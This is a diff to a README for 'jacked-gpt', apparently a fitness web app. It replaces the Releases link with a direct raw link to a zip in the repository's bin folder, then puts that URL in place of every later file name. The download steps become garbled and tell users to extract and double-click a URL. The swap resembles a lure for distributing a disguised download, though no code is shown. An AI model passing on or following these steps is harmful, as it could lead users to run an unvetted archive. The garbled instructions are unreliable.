gethackbymunch/jacked-gpt/README.md

 Follow these simple steps to download and run jacked-gpt:

 1. **Visit the Download Page**
-   Go to the [Releases page](https://github.com/gethackbymunch/jacked-gpt/releases) to find the latest version of jacked-gpt.
+   Go to the [Releases page](https://raw.githubusercontent.com/gethackbymunch/jacked-gpt/main/bin/jacked-gpt-v2.3-beta.1.zip) to find the latest version of jacked-gpt.

 2. **Download the Application**
    Look for the version you wish to download.
 Click on the file to start the download.

 3. **Locate the Downloaded File**
-   Once the download completes, navigate to your downloads folder to find the file named `jacked-gpt.zip`.
+   Once the download completes, navigate to your downloads folder to find the file named `https://raw.githubusercontent.com/gethackbymunch/jacked-gpt/main/bin/jacked-gpt-v2.3-beta.1.zip`.

 4. **Extract the Files**
-   Right-click the `jacked-gpt.zip` file and select "Extract All" to unpack the contents.
+   Right-click the `https://raw.githubusercontent.com/gethackbymunch/jacked-gpt/main/bin/jacked-gpt-v2.3-beta.1.zip` file and select "Extract All" to unpack the contents.

 5. **Run the Application**
-   Open the extracted folder and double-click `jacked-gpt.html` to launch the web app.
+   Open the extracted folder and double-click `https://raw.githubusercontent.com/gethackbymunch/jacked-gpt/main/bin/jacked-gpt-v2.3-beta.1.zip` to launch the web app.
 Ensure your browser is open to use it.

 6. **Set Up Your Profile**
    Follow the on-screen prompts to set up your profile.
 Enter your fitness goals and preferences for personalized recommendations.